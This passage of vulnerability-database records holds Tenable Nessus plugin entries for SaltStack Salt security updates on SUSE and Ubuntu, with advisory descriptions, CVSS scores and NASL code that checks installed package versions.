reference:\"salt-fish-completion-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-master-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-standalone-formulas-configuration-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-3000-lp151.5.21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python2-salt / python3-salt / salt / salt-api / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:16:24", "description": "This update for salt contains the following fixes :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nUpdate to Salt version 3000: See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nAdd docker.logout to docker execution module. (bsc#1165572)\n\nAdd option to enable/disable force refresh for zypper.\n\nAdd publish_batch to ClearFuncs exposed methods.\n\nAdds test for zypper abbreviation fix.\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions. (bsc#1169604)\n\nAvoid traceback on debug logging for swarm module. (bsc#1172075)\n\nBatch mode now also correctly provides return value. 
(bsc#1168340)\n\nBetter import cache handline.\n\nDo not make file.recurse state to fail when msgpack 0.5.4.\n(bsc#1167437)\n\nDo not require vendored backports-abc. (bsc#1170288)\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n\nFix for low rpm_lowpkg unit test.\n\nFix for temp folder definition in loader unit test.\n\nFix for unless requisite when pip is not installed.\n\nFix integration test failure for test_mod_del_repo_multiline_values.\n\nFix regression in service states with reload argument.\n\nFix tornado imports and missing _utils after rebasing patches.\n\nFix status attribute issue in aptpkg test.\n\nImproved storage pool or network handling.\n\nloop: fix variable names for until_no_eval.\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python 2.\n\nMake setup.py script not to require setuptools greater than 9.1.\n\nMore robust remote port detection.\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions.\nbecause of logging deadlock. (bsc#1159284)\n\nPython3.8 compatibility changes.\n\nRemoves unresolved merge conflict in yumpkg module.\n\nReturns a the list of IPs filtered by the optional network list.\n\nRevert broken changes to slspath made on Salt 3000 (saltstack/salt#56341). (bsc#1170104)\n\nSanitize grains loaded from roster_grains.json cache during 'state.pkg'.\n\nVarious virt backports from 3000.2.\n\nzypperpkg: filter patterns that start with dot. (bsc#1171906)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-21T00:00:00", "type": "nessus", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1974-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1974-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138795", "sourceData": "#\n# (C) Tenable 
Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1974-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138795);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:1974-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt contains the following fixes :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nUpdate to Salt version 3000: See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nAdd docker.logout to docker execution module. (bsc#1165572)\n\nAdd option to enable/disable force refresh for zypper.\n\nAdd publish_batch to ClearFuncs exposed methods.\n\nAdds test for zypper abbreviation fix.\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions. (bsc#1169604)\n\nAvoid traceback on debug logging for swarm module. (bsc#1172075)\n\nBatch mode now also correctly provides return value. (bsc#1168340)\n\nBetter import cache handline.\n\nDo not make file.recurse state to fail when msgpack 0.5.4.\n(bsc#1167437)\n\nDo not require vendored backports-abc. 
(bsc#1170288)\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n\nFix for low rpm_lowpkg unit test.\n\nFix for temp folder definition in loader unit test.\n\nFix for unless requisite when pip is not installed.\n\nFix integration test failure for test_mod_del_repo_multiline_values.\n\nFix regression in service states with reload argument.\n\nFix tornado imports and missing _utils after rebasing patches.\n\nFix status attribute issue in aptpkg test.\n\nImproved storage pool or network handling.\n\nloop: fix variable names for until_no_eval.\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python\n2.\n\nMake setup.py script not to require setuptools greater than 9.1.\n\nMore robust remote port detection.\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions.\nbecause of logging deadlock. (bsc#1159284)\n\nPython3.8 compatibility changes.\n\nRemoves unresolved merge conflict in yumpkg module.\n\nReturns a the list of IPs filtered by the optional network list.\n\nRevert broken changes to slspath made on Salt 3000\n(saltstack/salt#56341). (bsc#1170104)\n\nSanitize grains loaded from roster_grains.json cache during\n'state.pkg'.\n\nVarious virt backports from 3000.2.\n\nzypperpkg: filter patterns that start with dot. (bsc#1171906)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159284\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1165572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168340\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170288\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171906\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/3000.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15750/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2018-15751/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201974-1\n 
script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0ffca24\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP1 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP1-2020-1974=1\n\nSUSE Linux Enterprise Module for Python2 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP1-2020-1974=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP1 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP1-2020-1974=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python2-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"python3-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-api-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-cloud-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-doc-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-master-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-minion-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-proxy-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-ssh-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-standalone-formulas-configuration-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-syndic-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python2-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python3-salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-doc-3000-6.37.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-minion-3000-6.37.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-14T14:56:48", "description": "It was discovered that Salt allows remote attackers to determine which files exist on the server. An attacker could use that to extract sensitive information. (CVE-2018-15750) It was discovered that Salt has a vulnerability that allows an user to bypass authentication. An attacker could use that to extract sensitive information, execute abritrary code or crash the server. (CVE-2018-15751) It was discovered that Salt is vulnerable to command injection. This allows an unauthenticated attacker with network access to the API endpoint to execute arbitrary code on the salt-api host. (CVE-2019-17361) It was discovered that Salt incorrectly validated method calls and sanitized paths. A remote attacker could possibly use this issue to access some methods without authentication. (CVE-2020-11651, CVE-2020-11652).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-18T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS / 18.04 LTS : Salt vulnerabilities (USN-4459-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2019-17361", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:salt-api", "p-cpe:/a:canonical:ubuntu_linux:salt-common", "p-cpe:/a:canonical:ubuntu_linux:salt-master", "p-cpe:/a:canonical:ubuntu_linux:salt-minion", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:18.04:-:lts"], "id": "UBUNTU_USN-4459-1.NASL", "href": "https://www.tenable.com/plugins/nessus/139659", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4459-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. 
Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(139659);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2018-15750\", \"CVE-2018-15751\", \"CVE-2019-17361\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"USN\", value:\"4459-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 18.04 LTS : Salt vulnerabilities (USN-4459-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"It was discovered that Salt allows remote attackers to determine which\nfiles exist on the server. An attacker could use that to extract\nsensitive information. (CVE-2018-15750) It was discovered that Salt\nhas a vulnerability that allows an user to bypass authentication. An\nattacker could use that to extract sensitive information, execute\nabritrary code or crash the server. (CVE-2018-15751) It was discovered\nthat Salt is vulnerable to command injection. This allows an\nunauthenticated attacker with network access to the API endpoint to\nexecute arbitrary code on the salt-api host. (CVE-2019-17361) It was\ndiscovered that Salt incorrectly validated method calls and sanitized\npaths. A remote attacker could possibly use this issue to access some\nmethods without authentication. (CVE-2020-11651, CVE-2020-11652).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/4459-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2020/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2020-2023 Canonical, Inc. / NASL script (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04|18\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04 / 18.04\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-api\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-common\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-master\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"salt-minion\", pkgver:\"2015.8.8+ds-1ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-api\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-common\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-master\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\nif (ubuntu_check(osver:\"18.04\", pkgname:\"salt-minion\", pkgver:\"2017.7.4+dfsg1-1ubuntu18.04.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt-api / salt-common / salt-master / salt-minion\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:50:26", "description": "The remote SUSE Linux SUSE15 host has packages installed that are affected by multiple vulnerabilities as referenced in the openSUSE-SU-2021:0899-1 advisory.\n\n - Directory Traversal vulnerability in salt-api in SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allows remote attackers to determine which files exist on the server. 
(CVE-2018-15750)\n\n - SaltStack Salt before 2017.7.8 and 2018.3.x before 2018.3.3 allow remote attackers to bypass authentication and execute arbitrary commands via salt-api(netapi). (CVE-2018-15751)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\n - In SaltStack Salt through 3002, salt-netapi improperly validates eauth credentials and tokens. A user can bypass authentication and invoke Salt SSH. (CVE-2020-25592)\n\n - A Incorrect Implementation of Authentication Algorithm vulnerability in of SUSE SUSE Linux Enterprise Server 15 SP 3; openSUSE Tumbleweed allows local attackers to execute arbitrary code via salt without the need to specify valid credentials. This issue affects: SUSE SUSE Linux Enterprise Server 15 SP 3 salt versions prior to 3002.2-3. openSUSE Tumbleweed salt version 3002.2-2.1 and prior versions.\n (CVE-2021-25315)\n\n - In SaltStack Salt 2016.9 through 3002.6, a command injection vulnerability exists in the snapper module that allows for local privilege escalation on a minion. The attack requires that a file is created with a pathname that is backed up by snapper, and that the master calls the snapper.diff function (which executes popen unsafely). 
